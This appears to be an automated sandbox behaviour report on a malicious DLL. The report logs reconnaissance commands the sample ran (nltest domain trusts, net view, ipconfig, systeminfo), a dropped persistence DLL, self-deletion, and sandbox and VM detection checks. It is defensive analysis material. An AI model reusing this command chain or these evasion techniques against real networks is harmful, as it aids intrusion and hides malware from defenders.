Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 360total.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: 360total.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 360total.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 360total.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 360total.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 360total.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 360total.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 360total.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: 360total.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 360total.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 360total.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 360total.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 360total.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,

3_2_00000001800033E0

Source: Update_79066994.dll.4.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.dll	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c

Source: 360total.dll.dll	Static PE information: section name: yhDm^
Source: Update_79066994.dll.4.dr	Static PE information: section name: yhDm^

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180010451 push rcx; ret	3_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001045A push rcx; ret	3_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018017500F push rdx; iretd	3_2_0000000180175010

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\Windows\System32\rundll32.exe

File created: C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll

Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

3_2_0000000180049AEC

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\rundll32.exe

File deleted: c:\users\user\desktop\360total.dll.dll

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

3_2_0000000180062148

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\rundll32.exe

Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,

3_2_00000001800655A8

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180049AEC

3_2_0000000180049AEC

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	4_2_00000203431C68E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	4_2_00000203431C7FA8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	9_2_00000223801368E8
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	9_2_0000022380137FA8

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 825			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8912			Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll

Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

API coverage: 0.1 %

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180049AEC

3_2_0000000180049AEC

Source: C:\Windows\System32\rundll32.exe TID: 4288	Thread sleep count: 262 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4288	Thread sleep time: -262000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4424	Thread sleep count: 825 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4424	Thread sleep time: -82500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4288	Thread sleep count: 8912 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 4288	Thread sleep time: -8912000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431CA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	4_2_00000203431CA350
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	4_2_00000203431C1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_000002238013A350
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380131A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_0000022380131A08

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
Source: rundll32.exe, 00000004.00000002.2040462096.0000020342FFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rod_VMware_SATA_CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFED9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
